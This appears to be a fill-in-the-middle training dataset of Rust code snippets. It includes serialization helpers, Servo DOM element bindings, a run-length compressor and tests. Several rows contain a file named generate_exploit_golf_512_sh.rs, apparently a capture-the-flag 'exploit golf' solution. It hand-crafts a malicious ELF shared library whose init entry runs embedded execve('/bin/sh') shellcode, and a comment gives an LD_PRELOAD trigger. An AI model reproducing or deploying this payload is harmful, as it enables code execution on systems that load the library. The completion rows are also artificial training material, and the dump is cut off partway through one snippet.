file_name
large_stringlengths 4
69
| prefix
large_stringlengths 0
26.7k
| suffix
large_stringlengths 0
24.8k
| middle
large_stringlengths 0
2.12k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
mod.rs
|
extern crate rustc_serialize;
|
use rustc_serialize::{ Encodable, Decodable };
use byteorder::{ ByteOrder, BigEndian, WriteBytesExt };
use self::impl_rustc_serialize::{ encode as enc, decode as dec };
pub use super::*;
pub type EncodingResult<T> = impl_rustc_serialize::EncodingResult<T>;
pub type DecodingResult<T> = impl_rustc_serialize::DecodingResult<T>;
pub fn encode<T: Encodable>(data: &T) -> EncodingResult<Vec<u8>> {
enc(data)
}
pub fn decode<T: Decodable>(bytes: Vec<u8>) -> DecodingResult<T> {
dec::<T>(&bytes[..])
}
pub fn usize_as_u32(u: usize) -> u32 {
u as u32
}
//Preppends the length of a message
pub fn wrap_msg_len(msg: Vec<u8>) -> Vec<u8> {
let mut msg = msg;
let mut len_bytes = Vec::with_capacity(4);
len_bytes.write_u32::<BigEndian>(msg.len() as u32).unwrap();
len_bytes.append(&mut msg);
len_bytes
}
//Gets the length of a message if at least the 4 bytes in the u32 are provided
pub fn get_msg_len(msg: Vec<u8>) -> (Option<u32>, Vec<u8>) {
match msg.len() {
x if x >=4 => {
let mut msg = msg;
let msg_bytes = msg.split_off(4);
(Some(BigEndian::read_u32(&msg)), msg_bytes)
},
_ => (None, msg.clone())
}
}
|
mod impl_rustc_serialize;
|
random_line_split
|
htmlquoteelement.rs
|
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use crate::dom::bindings::codegen::Bindings::HTMLQuoteElementBinding;
use crate::dom::bindings::root::DomRoot;
use crate::dom::document::Document;
use crate::dom::htmlelement::HTMLElement;
use crate::dom::node::Node;
use dom_struct::dom_struct;
use html5ever::{LocalName, Prefix};
#[dom_struct]
pub struct HTMLQuoteElement {
htmlelement: HTMLElement,
}
impl HTMLQuoteElement {
fn
|
(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> HTMLQuoteElement {
HTMLQuoteElement {
htmlelement: HTMLElement::new_inherited(local_name, prefix, document),
}
}
#[allow(unrooted_must_root)]
pub fn new(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> DomRoot<HTMLQuoteElement> {
Node::reflect_node(
Box::new(HTMLQuoteElement::new_inherited(
local_name, prefix, document,
)),
document,
HTMLQuoteElementBinding::Wrap,
)
}
}
|
new_inherited
|
identifier_name
|
htmlquoteelement.rs
|
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use crate::dom::bindings::codegen::Bindings::HTMLQuoteElementBinding;
use crate::dom::bindings::root::DomRoot;
use crate::dom::document::Document;
use crate::dom::htmlelement::HTMLElement;
use crate::dom::node::Node;
use dom_struct::dom_struct;
use html5ever::{LocalName, Prefix};
#[dom_struct]
pub struct HTMLQuoteElement {
htmlelement: HTMLElement,
}
impl HTMLQuoteElement {
fn new_inherited(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> HTMLQuoteElement {
HTMLQuoteElement {
htmlelement: HTMLElement::new_inherited(local_name, prefix, document),
}
}
|
#[allow(unrooted_must_root)]
pub fn new(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> DomRoot<HTMLQuoteElement> {
Node::reflect_node(
Box::new(HTMLQuoteElement::new_inherited(
local_name, prefix, document,
)),
document,
HTMLQuoteElementBinding::Wrap,
)
}
}
|
random_line_split
|
|
htmlquoteelement.rs
|
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use crate::dom::bindings::codegen::Bindings::HTMLQuoteElementBinding;
use crate::dom::bindings::root::DomRoot;
use crate::dom::document::Document;
use crate::dom::htmlelement::HTMLElement;
use crate::dom::node::Node;
use dom_struct::dom_struct;
use html5ever::{LocalName, Prefix};
#[dom_struct]
pub struct HTMLQuoteElement {
htmlelement: HTMLElement,
}
impl HTMLQuoteElement {
fn new_inherited(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> HTMLQuoteElement
|
#[allow(unrooted_must_root)]
pub fn new(
local_name: LocalName,
prefix: Option<Prefix>,
document: &Document,
) -> DomRoot<HTMLQuoteElement> {
Node::reflect_node(
Box::new(HTMLQuoteElement::new_inherited(
local_name, prefix, document,
)),
document,
HTMLQuoteElementBinding::Wrap,
)
}
}
|
{
HTMLQuoteElement {
htmlelement: HTMLElement::new_inherited(local_name, prefix, document),
}
}
|
identifier_body
|
day_7.rs
|
pub fn compress(src: &str) -> String {
if src.is_empty() {
src.to_owned()
} else {
let mut compressed = String::new();
let mut chars = src.chars().peekable();
while let Some(c) = chars.peek().cloned() {
let mut counter = 0;
while let Some(n) = chars.peek().cloned() {
if c == n {
counter += 1;
chars.next();
} else {
break;
}
}
compressed.push_str(counter.to_string().as_str());
compressed.push(c);
}
compressed
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn compress_empty_string() {
assert_eq!(compress(""), "");
}
#[test]
fn compress_unique_chars_string() {
assert_eq!(compress("abc"), "1a1b1c");
}
#[test]
fn
|
() {
assert_eq!(compress("aabbcc"), "2a2b2c");
}
}
|
compress_doubled_chars_string
|
identifier_name
|
day_7.rs
|
pub fn compress(src: &str) -> String {
if src.is_empty() {
src.to_owned()
} else {
let mut compressed = String::new();
let mut chars = src.chars().peekable();
while let Some(c) = chars.peek().cloned() {
let mut counter = 0;
while let Some(n) = chars.peek().cloned() {
if c == n {
counter += 1;
chars.next();
} else {
break;
}
}
compressed.push_str(counter.to_string().as_str());
compressed.push(c);
}
compressed
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn compress_empty_string() {
assert_eq!(compress(""), "");
}
#[test]
fn compress_unique_chars_string()
|
#[test]
fn compress_doubled_chars_string() {
assert_eq!(compress("aabbcc"), "2a2b2c");
}
}
|
{
assert_eq!(compress("abc"), "1a1b1c");
}
|
identifier_body
|
day_7.rs
|
pub fn compress(src: &str) -> String {
if src.is_empty() {
src.to_owned()
} else {
let mut compressed = String::new();
let mut chars = src.chars().peekable();
while let Some(c) = chars.peek().cloned() {
let mut counter = 0;
while let Some(n) = chars.peek().cloned() {
if c == n {
counter += 1;
chars.next();
} else {
break;
}
}
compressed.push_str(counter.to_string().as_str());
compressed.push(c);
}
compressed
}
}
#[cfg(test)]
|
assert_eq!(compress(""), "");
}
#[test]
fn compress_unique_chars_string() {
assert_eq!(compress("abc"), "1a1b1c");
}
#[test]
fn compress_doubled_chars_string() {
assert_eq!(compress("aabbcc"), "2a2b2c");
}
}
|
mod tests {
use super::*;
#[test]
fn compress_empty_string() {
|
random_line_split
|
day_7.rs
|
pub fn compress(src: &str) -> String {
if src.is_empty()
|
else {
let mut compressed = String::new();
let mut chars = src.chars().peekable();
while let Some(c) = chars.peek().cloned() {
let mut counter = 0;
while let Some(n) = chars.peek().cloned() {
if c == n {
counter += 1;
chars.next();
} else {
break;
}
}
compressed.push_str(counter.to_string().as_str());
compressed.push(c);
}
compressed
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn compress_empty_string() {
assert_eq!(compress(""), "");
}
#[test]
fn compress_unique_chars_string() {
assert_eq!(compress("abc"), "1a1b1c");
}
#[test]
fn compress_doubled_chars_string() {
assert_eq!(compress("aabbcc"), "2a2b2c");
}
}
|
{
src.to_owned()
}
|
conditional_block
|
const-bound.rs
|
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Make sure const bounds work on things, and test that a few types
// are const.
fn foo<T:Copy + Const>(x: T) -> T
|
struct F { field: int }
pub fn main() {
/*foo(1);
foo(~"hi");
foo(~[1, 2, 3]);
foo(F{field: 42});
foo((1, 2u));
foo(@1);*/
foo(~1);
}
|
{ x }
|
identifier_body
|
const-bound.rs
|
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Make sure const bounds work on things, and test that a few types
// are const.
fn
|
<T:Copy + Const>(x: T) -> T { x }
struct F { field: int }
pub fn main() {
/*foo(1);
foo(~"hi");
foo(~[1, 2, 3]);
foo(F{field: 42});
foo((1, 2u));
foo(@1);*/
foo(~1);
}
|
foo
|
identifier_name
|
const-bound.rs
|
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Make sure const bounds work on things, and test that a few types
// are const.
fn foo<T:Copy + Const>(x: T) -> T { x }
struct F { field: int }
|
pub fn main() {
/*foo(1);
foo(~"hi");
foo(~[1, 2, 3]);
foo(F{field: 42});
foo((1, 2u));
foo(@1);*/
foo(~1);
}
|
random_line_split
|
|
htmlulistelement.rs
|
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::codegen::Bindings::HTMLUListElementBinding;
use dom::bindings::codegen::InheritTypes::HTMLUListElementDerived;
use dom::bindings::js::Root;
use dom::document::Document;
use dom::element::ElementTypeId;
use dom::eventtarget::{EventTarget, EventTargetTypeId};
use dom::htmlelement::{HTMLElement, HTMLElementTypeId};
use dom::node::{Node, NodeTypeId};
use util::str::DOMString;
#[dom_struct]
#[derive(HeapSizeOf)]
pub struct HTMLUListElement {
htmlelement: HTMLElement
}
|
fn is_htmlulistelement(&self) -> bool {
*self.type_id() ==
EventTargetTypeId::Node(
NodeTypeId::Element(ElementTypeId::HTMLElement(HTMLElementTypeId::HTMLUListElement)))
}
}
impl HTMLUListElement {
fn new_inherited(localName: DOMString, prefix: Option<DOMString>, document: &Document) -> HTMLUListElement {
HTMLUListElement {
htmlelement: HTMLElement::new_inherited(HTMLElementTypeId::HTMLUListElement, localName, prefix, document)
}
}
#[allow(unrooted_must_root)]
pub fn new(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> Root<HTMLUListElement> {
let element = HTMLUListElement::new_inherited(localName, prefix, document);
Node::reflect_node(box element, document, HTMLUListElementBinding::Wrap)
}
}
|
impl HTMLUListElementDerived for EventTarget {
|
random_line_split
|
htmlulistelement.rs
|
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::codegen::Bindings::HTMLUListElementBinding;
use dom::bindings::codegen::InheritTypes::HTMLUListElementDerived;
use dom::bindings::js::Root;
use dom::document::Document;
use dom::element::ElementTypeId;
use dom::eventtarget::{EventTarget, EventTargetTypeId};
use dom::htmlelement::{HTMLElement, HTMLElementTypeId};
use dom::node::{Node, NodeTypeId};
use util::str::DOMString;
#[dom_struct]
#[derive(HeapSizeOf)]
pub struct HTMLUListElement {
htmlelement: HTMLElement
}
impl HTMLUListElementDerived for EventTarget {
fn is_htmlulistelement(&self) -> bool {
*self.type_id() ==
EventTargetTypeId::Node(
NodeTypeId::Element(ElementTypeId::HTMLElement(HTMLElementTypeId::HTMLUListElement)))
}
}
impl HTMLUListElement {
fn new_inherited(localName: DOMString, prefix: Option<DOMString>, document: &Document) -> HTMLUListElement {
HTMLUListElement {
htmlelement: HTMLElement::new_inherited(HTMLElementTypeId::HTMLUListElement, localName, prefix, document)
}
}
#[allow(unrooted_must_root)]
pub fn
|
(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> Root<HTMLUListElement> {
let element = HTMLUListElement::new_inherited(localName, prefix, document);
Node::reflect_node(box element, document, HTMLUListElementBinding::Wrap)
}
}
|
new
|
identifier_name
|
generate_exploit_golf_512_sh.rs
|
/*!
```cargo
[dependencies]
goblin = "0.2"
anyhow = "1.0"
faerie = "0.15"
target-lexicon = "0.10"
```
*/
extern crate faerie;
extern crate goblin;
extern crate target_lexicon;
use goblin::elf::{Elf, dynamic::*};
use goblin::elf64::{
header::{self, Header},
program_header::{self as Phdr, ProgramHeader},
section_header::{self as Shdr, SectionHeader},
dynamic,
};
use std::{io, mem};
use std::io::Write;
use std::collections::BTreeMap;
use std::fs::{self, File};
use std::str::FromStr;
use faerie::{ArtifactBuilder, Decl, Link, SectionKind};
fn main_old() -> Result<(), anyhow::Error> {
//let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-linux-gnu")).library(true).finish();
let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-unknown-unknown-unknown-elf")).library(true).finish();
elf.declare(".init", Decl::section(SectionKind::Data))?;
elf.declare("main", Decl::function().global())?;
//let mut symbols = BTreeMap::new();
//symbols.insert("main".into(), 0);
//elf.define_with_symbols(".init", vec![0xeb, 0xfe], symbols)?;
elf.define(".init", vec![0xeb, 0xfe])?;
elf.define("main", vec![0xeb, 0xfe])?;
//elf.link(Link { from: ".init", to: "main", at: 0})?;
//elf.write(File::create("libgolf.so")?)?;
let mut elfbytes: Vec<u8> = elf.emit()?;
//let mut elf2 = Elf::parse(&elfbytes)?;
println!("elfbytes {:?}", elfbytes);
{
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
println!("header {:?}", header);
header.e_type = header::ET_DYN | header::ET_EXEC;
println!("header {:?}", header);
for i in 0..(header.e_shnum as usize) {
let mut shdr: &mut SectionHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(header.e_shoff as isize).offset(header.e_shentsize as isize*i as isize) as *mut SectionHeader) };
println!("shdr {}: {:?}", i, shdr);
}
}
println!("elfbytes {:?}", elfbytes);
let mut file = File::create("libgolf.so")?;
file.write(&elfbytes)?;
Ok(())
}
fn main() -> Result<(), anyhow::Error> {
/*let bytes_from_c = fs::read("./a.out")?;
let from_c = Elf::parse(&bytes_from_c)?;
|
let e_ident = [0x7f, b'E', b'L', b'F', header::ELFCLASS64, header::ELFDATA2LSB, header::EV_CURRENT, header::ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0];
let mut elfbytes = vec![0; 512];
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
*header = Header {
e_ident,
e_type: header::ET_DYN,
e_machine: header::EM_X86_64,
e_version: header::EV_CURRENT as _,
e_entry: 0x41410100,
e_phoff: 128,
e_shoff: 0,
e_flags: 0,
e_ehsize: mem::size_of::<Header>() as _,
e_phentsize: mem::size_of::<ProgramHeader>() as _,
e_phnum: 2,
e_shentsize: mem::size_of::<SectionHeader>() as _,
e_shnum: 0,
e_shstrndx: 0,
};
println!("header: {:?}", header);
let mut phdr: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128) as *mut ProgramHeader) };
*phdr = ProgramHeader {
p_type: Phdr::PT_LOAD,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 0,
p_vaddr: 0x41410000,
p_paddr: 0x41410000,
p_filesz: 512,
p_memsz: 512,
p_align: 0x1000,
};
println!("phdr: {:?}", phdr);
let mut phdr2: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128).offset(mem::size_of::<ProgramHeader>() as _) as *mut ProgramHeader) };
*phdr2 = ProgramHeader {
p_type: Phdr::PT_DYNAMIC,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 400,
p_vaddr: 0x41410190,
p_paddr: 0,
p_filesz: mem::size_of::<dynamic::Dyn>() as _,
p_memsz: mem::size_of::<dynamic::Dyn>() as _,
p_align: 8,
};
println!("phdr2: {:?}", phdr2);
/*
0: 48 ba 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rdx
7: 73 68 00
a: 48 83 e8 10 sub $0x10,%rax
e: 48 89 10 mov %rdx,(%rax)
11: 48 89 c7 mov %rax,%rdi
14: 48 31 d2 xor %rdx,%rdx
17: 48 83 e8 08 sub $0x8,%rax
1b: 48 89 10 mov %rdx,(%rax)
1e: 48 83 e8 08 sub $0x8,%rax
22: 48 89 38 mov %rdi,(%rax)
25: 48 89 c6 mov %rax,%rsi
28: 48 31 c0 xor %rax,%rax
2b: b0 3b mov $0x3b,%al
2d: 0f 05 syscall
---
b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05"
*/
//let shellcode = b"\xeb\xfe";
//let shellcode = b"\xff\x34\x25\x2f\x73\x68\x00\xff\x34\x25\x2f\x62\x69\x6e\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
for (i, x) in shellcode.iter().enumerate() {
elfbytes[256+i] = *x;
}
let dynamic = vec![
// https://docs.oracle.com/cd/E19683-01/817-3677/chapter6-42444/index.html
//dynamic::Dyn { d_tag: DT_HASH, d_val: 1 },
dynamic::Dyn { d_tag: DT_INIT, d_val: 0x41410100 },
dynamic::Dyn { d_tag: DT_STRTAB, d_val: 2 },
dynamic::Dyn { d_tag: DT_SYMTAB, d_val: 3 },
dynamic::Dyn { d_tag: DT_STRSZ, d_val: 0 },
dynamic::Dyn { d_tag: DT_SYMENT, d_val: 0 },
dynamic::Dyn { d_tag: DT_NULL, d_val: 0 },
];
let mut dynamic_raw: &mut [dynamic::Dyn] = unsafe { std::slice::from_raw_parts_mut(elfbytes.as_mut_ptr().offset(400) as *mut dynamic::Dyn, dynamic.len()) };
for (x, y) in dynamic.into_iter().zip(dynamic_raw.iter_mut()) {
*y = x;
}
let mut file = File::create("libgolf2.so")?;
file.write(&elfbytes)?;
Ok(())
}
/*
set follow-fork-mode child
r -c 'LD_PRELOAD=./libgolf2.so /bin/true'
*/
|
println!("{:#?}", from_c);*/
|
random_line_split
|
generate_exploit_golf_512_sh.rs
|
/*!
```cargo
[dependencies]
goblin = "0.2"
anyhow = "1.0"
faerie = "0.15"
target-lexicon = "0.10"
```
*/
extern crate faerie;
extern crate goblin;
extern crate target_lexicon;
use goblin::elf::{Elf, dynamic::*};
use goblin::elf64::{
header::{self, Header},
program_header::{self as Phdr, ProgramHeader},
section_header::{self as Shdr, SectionHeader},
dynamic,
};
use std::{io, mem};
use std::io::Write;
use std::collections::BTreeMap;
use std::fs::{self, File};
use std::str::FromStr;
use faerie::{ArtifactBuilder, Decl, Link, SectionKind};
fn main_old() -> Result<(), anyhow::Error> {
//let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-linux-gnu")).library(true).finish();
let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-unknown-unknown-unknown-elf")).library(true).finish();
elf.declare(".init", Decl::section(SectionKind::Data))?;
elf.declare("main", Decl::function().global())?;
//let mut symbols = BTreeMap::new();
//symbols.insert("main".into(), 0);
//elf.define_with_symbols(".init", vec![0xeb, 0xfe], symbols)?;
elf.define(".init", vec![0xeb, 0xfe])?;
elf.define("main", vec![0xeb, 0xfe])?;
//elf.link(Link { from: ".init", to: "main", at: 0})?;
//elf.write(File::create("libgolf.so")?)?;
let mut elfbytes: Vec<u8> = elf.emit()?;
//let mut elf2 = Elf::parse(&elfbytes)?;
println!("elfbytes {:?}", elfbytes);
{
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
println!("header {:?}", header);
header.e_type = header::ET_DYN | header::ET_EXEC;
println!("header {:?}", header);
for i in 0..(header.e_shnum as usize) {
let mut shdr: &mut SectionHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(header.e_shoff as isize).offset(header.e_shentsize as isize*i as isize) as *mut SectionHeader) };
println!("shdr {}: {:?}", i, shdr);
}
}
println!("elfbytes {:?}", elfbytes);
let mut file = File::create("libgolf.so")?;
file.write(&elfbytes)?;
Ok(())
}
fn
|
() -> Result<(), anyhow::Error> {
/*let bytes_from_c = fs::read("./a.out")?;
let from_c = Elf::parse(&bytes_from_c)?;
println!("{:#?}", from_c);*/
let e_ident = [0x7f, b'E', b'L', b'F', header::ELFCLASS64, header::ELFDATA2LSB, header::EV_CURRENT, header::ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0];
let mut elfbytes = vec![0; 512];
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
*header = Header {
e_ident,
e_type: header::ET_DYN,
e_machine: header::EM_X86_64,
e_version: header::EV_CURRENT as _,
e_entry: 0x41410100,
e_phoff: 128,
e_shoff: 0,
e_flags: 0,
e_ehsize: mem::size_of::<Header>() as _,
e_phentsize: mem::size_of::<ProgramHeader>() as _,
e_phnum: 2,
e_shentsize: mem::size_of::<SectionHeader>() as _,
e_shnum: 0,
e_shstrndx: 0,
};
println!("header: {:?}", header);
let mut phdr: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128) as *mut ProgramHeader) };
*phdr = ProgramHeader {
p_type: Phdr::PT_LOAD,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 0,
p_vaddr: 0x41410000,
p_paddr: 0x41410000,
p_filesz: 512,
p_memsz: 512,
p_align: 0x1000,
};
println!("phdr: {:?}", phdr);
let mut phdr2: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128).offset(mem::size_of::<ProgramHeader>() as _) as *mut ProgramHeader) };
*phdr2 = ProgramHeader {
p_type: Phdr::PT_DYNAMIC,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 400,
p_vaddr: 0x41410190,
p_paddr: 0,
p_filesz: mem::size_of::<dynamic::Dyn>() as _,
p_memsz: mem::size_of::<dynamic::Dyn>() as _,
p_align: 8,
};
println!("phdr2: {:?}", phdr2);
/*
0: 48 ba 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rdx
7: 73 68 00
a: 48 83 e8 10 sub $0x10,%rax
e: 48 89 10 mov %rdx,(%rax)
11: 48 89 c7 mov %rax,%rdi
14: 48 31 d2 xor %rdx,%rdx
17: 48 83 e8 08 sub $0x8,%rax
1b: 48 89 10 mov %rdx,(%rax)
1e: 48 83 e8 08 sub $0x8,%rax
22: 48 89 38 mov %rdi,(%rax)
25: 48 89 c6 mov %rax,%rsi
28: 48 31 c0 xor %rax,%rax
2b: b0 3b mov $0x3b,%al
2d: 0f 05 syscall
---
b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05"
*/
//let shellcode = b"\xeb\xfe";
//let shellcode = b"\xff\x34\x25\x2f\x73\x68\x00\xff\x34\x25\x2f\x62\x69\x6e\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
for (i, x) in shellcode.iter().enumerate() {
elfbytes[256+i] = *x;
}
let dynamic = vec![
// https://docs.oracle.com/cd/E19683-01/817-3677/chapter6-42444/index.html
//dynamic::Dyn { d_tag: DT_HASH, d_val: 1 },
dynamic::Dyn { d_tag: DT_INIT, d_val: 0x41410100 },
dynamic::Dyn { d_tag: DT_STRTAB, d_val: 2 },
dynamic::Dyn { d_tag: DT_SYMTAB, d_val: 3 },
dynamic::Dyn { d_tag: DT_STRSZ, d_val: 0 },
dynamic::Dyn { d_tag: DT_SYMENT, d_val: 0 },
dynamic::Dyn { d_tag: DT_NULL, d_val: 0 },
];
let mut dynamic_raw: &mut [dynamic::Dyn] = unsafe { std::slice::from_raw_parts_mut(elfbytes.as_mut_ptr().offset(400) as *mut dynamic::Dyn, dynamic.len()) };
for (x, y) in dynamic.into_iter().zip(dynamic_raw.iter_mut()) {
*y = x;
}
let mut file = File::create("libgolf2.so")?;
file.write(&elfbytes)?;
Ok(())
}
/*
set follow-fork-mode child
r -c 'LD_PRELOAD=./libgolf2.so /bin/true'
*/
|
main
|
identifier_name
|
generate_exploit_golf_512_sh.rs
|
/*!
```cargo
[dependencies]
goblin = "0.2"
anyhow = "1.0"
faerie = "0.15"
target-lexicon = "0.10"
```
*/
extern crate faerie;
extern crate goblin;
extern crate target_lexicon;
use goblin::elf::{Elf, dynamic::*};
use goblin::elf64::{
header::{self, Header},
program_header::{self as Phdr, ProgramHeader},
section_header::{self as Shdr, SectionHeader},
dynamic,
};
use std::{io, mem};
use std::io::Write;
use std::collections::BTreeMap;
use std::fs::{self, File};
use std::str::FromStr;
use faerie::{ArtifactBuilder, Decl, Link, SectionKind};
fn main_old() -> Result<(), anyhow::Error> {
//let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-linux-gnu")).library(true).finish();
let mut elf = ArtifactBuilder::new(target_lexicon::triple!("x86_64-unknown-unknown-unknown-elf")).library(true).finish();
elf.declare(".init", Decl::section(SectionKind::Data))?;
elf.declare("main", Decl::function().global())?;
//let mut symbols = BTreeMap::new();
//symbols.insert("main".into(), 0);
//elf.define_with_symbols(".init", vec![0xeb, 0xfe], symbols)?;
elf.define(".init", vec![0xeb, 0xfe])?;
elf.define("main", vec![0xeb, 0xfe])?;
//elf.link(Link { from: ".init", to: "main", at: 0})?;
//elf.write(File::create("libgolf.so")?)?;
let mut elfbytes: Vec<u8> = elf.emit()?;
//let mut elf2 = Elf::parse(&elfbytes)?;
println!("elfbytes {:?}", elfbytes);
{
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
println!("header {:?}", header);
